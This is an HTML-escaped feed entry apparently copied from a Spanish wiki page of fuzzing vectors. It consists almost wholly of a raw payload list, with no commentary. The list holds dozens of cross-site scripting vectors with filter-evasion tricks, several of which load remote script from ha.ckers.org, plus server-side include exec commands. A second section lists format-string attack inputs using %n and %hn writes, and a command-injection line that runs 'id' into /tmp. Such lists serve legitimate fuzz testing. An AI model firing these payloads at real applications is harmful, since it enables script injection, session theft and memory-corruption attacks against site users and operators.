&amp;lt;XML ID=I&amp;gt;&amp;lt;X&amp;gt;&amp;lt;C&amp;gt;&amp;lt;![CDATA[&amp;lt;IMG SRC=&amp;quot;javas]]&amp;gt;&amp;lt;![CDATA[cript:alert('XSS');&amp;quot;&amp;gt;]]&amp;gt;&amp;lt;/C&amp;gt;&amp;lt;/X&amp;gt;&amp;lt;/xml&amp;gt;&amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;gt;&amp;lt;/SPAN&amp;gt;&lt;br /&gt;
&amp;lt;XML ID=&amp;quot;xss&amp;quot;&amp;gt;&amp;lt;I&amp;gt;&amp;lt;B&amp;gt;&amp;amp;lt;IMG SRC=&amp;quot;javas&amp;lt;!-- --&amp;gt;cript:alert('XSS')&amp;quot;&amp;amp;gt;&amp;lt;/B&amp;gt;&amp;lt;/I&amp;gt;&amp;lt;/XML&amp;gt;&amp;lt;SPAN DATASRC=&amp;quot;#xss&amp;quot; DATAFLD=&amp;quot;B&amp;quot; DATAFORMATAS=&amp;quot;HTML&amp;quot;&amp;gt;&amp;lt;/SPAN&amp;gt;&lt;br /&gt;
&amp;lt;XML SRC=&amp;quot;xsstest.xml&amp;quot; ID=I&amp;gt;&amp;lt;/XML&amp;gt;&amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;gt;&amp;lt;/SPAN&amp;gt;&lt;br /&gt;
&amp;lt;HTML&amp;gt;&amp;lt;BODY&amp;gt;&amp;lt;?xml:namespace prefix=&amp;quot;t&amp;quot; ns=&amp;quot;urn:schemas-microsoft-com:time&amp;quot;&amp;gt;&amp;lt;?import namespace=&amp;quot;t&amp;quot; implementation=&amp;quot;#default#time2&amp;quot;&amp;gt;&amp;lt;t:set attributeName=&amp;quot;innerHTML&amp;quot; to=&amp;quot;XSS&amp;amp;lt;SCRIPT DEFER&amp;amp;gt;alert(&amp;amp;quot;XSS&amp;amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;gt;&amp;lt;/BODY&amp;gt;&amp;lt;/HTML&amp;gt;&lt;br /&gt;
&amp;lt;SCRIPT SRC=&amp;quot;http://ha.ckers.org/xss.jpg&amp;quot;&amp;gt;&amp;lt;/SCRIPT&amp;gt;&lt;br /&gt;
&amp;lt;!--#exec cmd=&amp;quot;/bin/echo '&amp;lt;SCR'&amp;quot;--&amp;gt;&amp;lt;!--#exec cmd=&amp;quot;/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js&amp;gt;&amp;lt;/SCRIPT&amp;gt;'&amp;quot;--&amp;gt;&lt;br /&gt;
&amp;lt;? echo('&amp;lt;SCR)';echo('IPT&amp;gt;alert(&amp;quot;XSS&amp;quot;)&amp;lt;/SCRIPT&amp;gt;'); ?&amp;gt;&lt;br /&gt;
&amp;lt;META HTTP-EQUIV=&amp;quot;Set-Cookie&amp;quot; Content=&amp;quot;USERID=&amp;amp;lt;SCRIPT&amp;amp;gt;alert('XSS')&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;HEAD&amp;gt;&amp;lt;META HTTP-EQUIV=&amp;quot;CONTENT-TYPE&amp;quot; CONTENT=&amp;quot;text/html; charset=UTF-7&amp;quot;&amp;gt; &amp;lt;/HEAD&amp;gt;+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-&lt;br /&gt;
&amp;lt;SCRIPT a=&amp;quot;&amp;gt;&amp;quot; SRC=&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;gt;&amp;lt;/SCRIPT&amp;gt;&lt;br /&gt;
&amp;lt;SCRIPT =&amp;quot;&amp;gt;&amp;quot; SRC=&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;gt;&amp;lt;/SCRIPT&amp;gt;&lt;br /&gt;
&amp;lt;SCRIPT a=&amp;quot;&amp;gt;&amp;quot; '' SRC=&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;gt;&amp;lt;/SCRIPT&amp;gt;&lt;br /&gt;
&amp;lt;SCRIPT &amp;quot;a='&amp;gt;'&amp;quot; SRC=&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;gt;&amp;lt;/SCRIPT&amp;gt;&lt;br /&gt;
&amp;lt;SCRIPT a=`&amp;gt;` SRC=&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;gt;&amp;lt;/SCRIPT&amp;gt;&lt;br /&gt;
&amp;lt;SCRIPT a=&amp;quot;&amp;gt;'&amp;gt;&amp;quot; SRC=&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;gt;&amp;lt;/SCRIPT&amp;gt;&lt;br /&gt;
&amp;lt;SCRIPT&amp;gt;document.write(&amp;quot;&amp;lt;SCRI&amp;quot;);&amp;lt;/SCRIPT&amp;gt;PT SRC=&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;gt;&amp;lt;/SCRIPT&amp;gt;&lt;br /&gt;
&amp;lt;A HREF=&amp;quot;http://66.102.7.147/&amp;quot;&amp;gt;XSS&amp;lt;/A&amp;gt;&lt;br /&gt;
&amp;lt;A HREF=&amp;quot;http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D&amp;quot;&amp;gt;XSS&amp;lt;/A&amp;gt;&lt;br /&gt;
&amp;lt;A HREF=&amp;quot;http://1113982867/&amp;quot;&amp;gt;XSS&amp;lt;/A&amp;gt;&lt;br /&gt;
&amp;lt;A HREF=&amp;quot;http://0x42.0x0000066.0x7.0x93/&amp;quot;&amp;gt;XSS&amp;lt;/A&amp;gt;&lt;br /&gt;
&amp;lt;A HREF=&amp;quot;http://0102.0146.0007.00000223/&amp;quot;&amp;gt;XSS&amp;lt;/A&amp;gt;&lt;br /&gt;
&amp;lt;A HREF=&amp;quot;h\ntt\tp://6&amp;amp;#9;6.000146.0x7.147/&amp;quot;&amp;gt;XSS&amp;lt;/A&amp;gt;&lt;br /&gt;
&amp;lt;A HREF=&amp;quot;//www.google.com/&amp;quot;&amp;gt;XSS&amp;lt;/A&amp;gt;&lt;br /&gt;
&amp;lt;A HREF=&amp;quot;//google&amp;quot;&amp;gt;XSS&amp;lt;/A&amp;gt;&lt;br /&gt;
&amp;lt;A HREF=&amp;quot;http://google.com/&amp;quot;&amp;gt;XSS&amp;lt;/A&amp;gt;&lt;br /&gt;
&amp;lt;A HREF=&amp;quot;http://www.google.com./&amp;quot;&amp;gt;XSS&amp;lt;/A&amp;gt;&lt;br /&gt;
&amp;lt;A HREF=&amp;quot;javascript:document.location='http://www.google.com/'&amp;quot;&amp;gt;XSS&amp;lt;/A&amp;gt;&lt;br /&gt;
&amp;lt;A HREF=&amp;quot;http://www.gohttp://www.google.com/ogle.com/&amp;quot;&amp;gt;XSS&amp;lt;/A&amp;gt;&lt;br /&gt;
&amp;lt;a href=&amp;quot;javas&amp;amp;#99;ript&amp;amp;#35;document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;a href=&amp;quot;javas&amp;amp;#99;ript&amp;amp;#35;document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;div onmouseover=&amp;quot;document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;img src=&amp;quot;javascript:document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;img dynsrc=&amp;quot;javascript:document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;input type=&amp;quot;image&amp;quot; dynsrc=&amp;quot;javascript:document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;bgsound src=&amp;quot;javascript:document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;amp;&amp;lt;script&amp;gt;document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;lt;/script&amp;gt;&lt;br /&gt;
&amp;amp;{document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);};&lt;br /&gt;
&amp;lt;img src=&amp;amp;{document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);};&amp;gt;&lt;br /&gt;
&amp;lt;link rel=&amp;quot;stylesheet&amp;quot; href=&amp;quot;javascript:document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;iframe src=&amp;quot;vbscript:document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;img src=&amp;quot;mocha:document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;img src=&amp;quot;livescript:document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;a href=&amp;quot;about:&amp;lt;s&amp;amp;#99;ript&amp;gt;document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;lt;/script&amp;gt;&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;meta http-equiv=&amp;quot;refresh&amp;quot; content=&amp;quot;0;url=javascript:document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;body onload=&amp;quot;document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;div style=&amp;quot;background-image: url(javascript:document.write(&amp;quot;XSS-XSS-XSS&amp;quot;););&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;div style=&amp;quot;behaviour: url([link to code]);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;div style=&amp;quot;binding: url([link to code]);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;div style=&amp;quot;width: expression(document.write(&amp;quot;XSS-XSS-XSS&amp;quot;););&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;style type=&amp;quot;text/javascript&amp;quot;&amp;gt;document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;lt;/style&amp;gt;&lt;br /&gt;
&amp;lt;object classid=&amp;quot;clsid:...&amp;quot; codebase=&amp;quot;javascript:document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;style&amp;gt;&amp;lt;!--&amp;lt;/style&amp;gt;&amp;lt;script&amp;gt;document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);//--&amp;gt;&amp;lt;/script&amp;gt;&lt;br /&gt;
&amp;lt;![CDATA[&amp;lt;!--]]&amp;gt;&amp;lt;script&amp;gt;document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);//--&amp;gt;&amp;lt;/script&amp;gt;&lt;br /&gt;
&amp;lt;!-- -- --&amp;gt;&amp;lt;script&amp;gt;document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;lt;/script&amp;gt;&amp;lt;!-- -- --&amp;gt;&lt;br /&gt;
&amp;lt;&amp;lt;script&amp;gt;document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;lt;/script&amp;gt;&lt;br /&gt;
&amp;lt;img src=&amp;quot;blah&amp;quot;onmouseover=&amp;quot;document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;img src=&amp;quot;blah&amp;gt;&amp;quot; onmouseover=&amp;quot;document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;xml src=&amp;quot;javascript:document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;xml id=&amp;quot;X&amp;quot;&amp;gt;&amp;lt;a&amp;gt;&amp;lt;b&amp;gt;&amp;amp;lt;script&amp;gt;document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;amp;lt;/script&amp;gt;;&amp;lt;/b&amp;gt;&amp;lt;/a&amp;gt;&amp;lt;/xml&amp;gt;&lt;br /&gt;
&amp;lt;div datafld=&amp;quot;b&amp;quot; dataformatas=&amp;quot;html&amp;quot; datasrc=&amp;quot;#X&amp;quot;&amp;gt;&amp;lt;/div&amp;gt;&lt;br /&gt;
&amp;lt;a href=&amp;quot;javas&amp;amp;#99;ript&amp;amp;#35;document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;div onmouseover=&amp;quot;document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;img src=&amp;quot;javascript:document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;img dynsrc=&amp;quot;javascript:document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;input type=&amp;quot;image&amp;quot; dynsrc=&amp;quot;javascript:document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;bgsound src=&amp;quot;javascript:document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;amp;&amp;lt;script&amp;gt;document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;lt;/script&amp;gt;&lt;br /&gt;
&amp;amp;{document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);};&lt;br /&gt;
&amp;lt;img src=&amp;amp;{document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);};&amp;gt;&lt;br /&gt;
&amp;lt;link rel=&amp;quot;stylesheet&amp;quot; href=&amp;quot;javascript:document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;iframe src=&amp;quot;vbscript:document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;img src=&amp;quot;mocha:document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;img src=&amp;quot;livescript:document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;a href=&amp;quot;about:&amp;lt;s&amp;amp;#99;ript&amp;gt;document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;lt;/script&amp;gt;&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;meta http-equiv=&amp;quot;refresh&amp;quot; content=&amp;quot;0;url=javascript:document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;body onload=&amp;quot;document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;div style=&amp;quot;background-image: url(javascript:document.write(&amp;quot;XSS-XSS-XSS&amp;quot;););&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;div style=&amp;quot;behaviour: url([link to code]);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;div style=&amp;quot;binding: url([link to code]);&amp;quot;&amp;gt; [Mozilla]&lt;br /&gt;
&amp;lt;div style=&amp;quot;width: expression(document.write(&amp;quot;XSS-XSS-XSS&amp;quot;););&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;style type=&amp;quot;text/javascript&amp;quot;&amp;gt;document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;lt;/style&amp;gt;&lt;br /&gt;
&amp;lt;object classid=&amp;quot;clsid:...&amp;quot; codebase=&amp;quot;javascript:document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;style&amp;gt;&amp;lt;!--&amp;lt;/style&amp;gt;&amp;lt;script&amp;gt;document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);//--&amp;gt;&amp;lt;/script&amp;gt;&lt;br /&gt;
&amp;lt;![CDATA[&amp;lt;!--]]&amp;gt;&amp;lt;script&amp;gt;document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);//--&amp;gt;&amp;lt;/script&amp;gt;&lt;br /&gt;
&amp;lt;!-- -- --&amp;gt;&amp;lt;script&amp;gt;document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;lt;/script&amp;gt;&amp;lt;!-- -- --&amp;gt;&lt;br /&gt;
&amp;lt;&amp;lt;script&amp;gt;document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;lt;/script&amp;gt;&lt;br /&gt;
&amp;lt;img src=&amp;quot;blah&amp;quot;onmouseover=&amp;quot;document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;img src=&amp;quot;blah&amp;gt;&amp;quot; onmouseover=&amp;quot;document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;xml src=&amp;quot;javascript:document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;xml id=&amp;quot;X&amp;quot;&amp;gt;&amp;lt;a&amp;gt;&amp;lt;b&amp;gt;&amp;amp;lt;script&amp;gt;document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);&amp;amp;lt;/script&amp;gt;;&amp;lt;/b&amp;gt;&amp;lt;/a&amp;gt;&amp;lt;/xml&amp;gt;&lt;br /&gt;
&amp;lt;div datafld=&amp;quot;b&amp;quot; dataformatas=&amp;quot;html&amp;quot; datasrc=&amp;quot;#X&amp;quot;&amp;gt;&amp;lt;/div&amp;gt;&lt;br /&gt;
[\xC0][\xBC]script&amp;gt;document.write(&amp;quot;XSS-XSS-XSS&amp;quot;);[\xC0][\xBC]/script&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Declaraciones de Formato de Cadenas ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
%s%p%x%d&lt;br /&gt;
.1024d&lt;br /&gt;
%.2049d&lt;br /&gt;
%p%p%p%p&lt;br /&gt;
%x%x%x%x&lt;br /&gt;
%d%d%d%d&lt;br /&gt;
%s%s%s%s&lt;br /&gt;
%99999999999s&lt;br /&gt;
%08x&lt;br /&gt;
%%20d&lt;br /&gt;
%%20n&lt;br /&gt;
%%20x&lt;br /&gt;
%%20s&lt;br /&gt;
%s%s%s%s%s%s%s%s%s%s&lt;br /&gt;
%p%p%p%p%p%p%p%p%p%p&lt;br /&gt;
%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%&lt;br /&gt;
f(x)=%s x 123&lt;br /&gt;
f(x)=%x x 255&lt;br /&gt;
%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x&lt;br /&gt;
%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s&lt;br /&gt;
XXXXX.%p&lt;br /&gt;
XXXXX`perl -e 'print &amp;quot;.%p&amp;quot; x 80'`&lt;br /&gt;
`perl -e 'print &amp;quot;.%p&amp;quot; x 80'`%n&lt;br /&gt;
%08x.%08x.%08x.%08x.%08x\n&lt;br /&gt;
XXX0_%08x.%08x.%08x.%08x.%08x\n&lt;br /&gt;
%.16705u%2\$hn&lt;br /&gt;
\x10\x01\x48\x08_%08x.%08x.%08x.%08x.%08x|%s|&lt;br /&gt;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;id &amp;gt; /tmp/file; exit;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Jcmax</name></author>	</entry>

	</feed>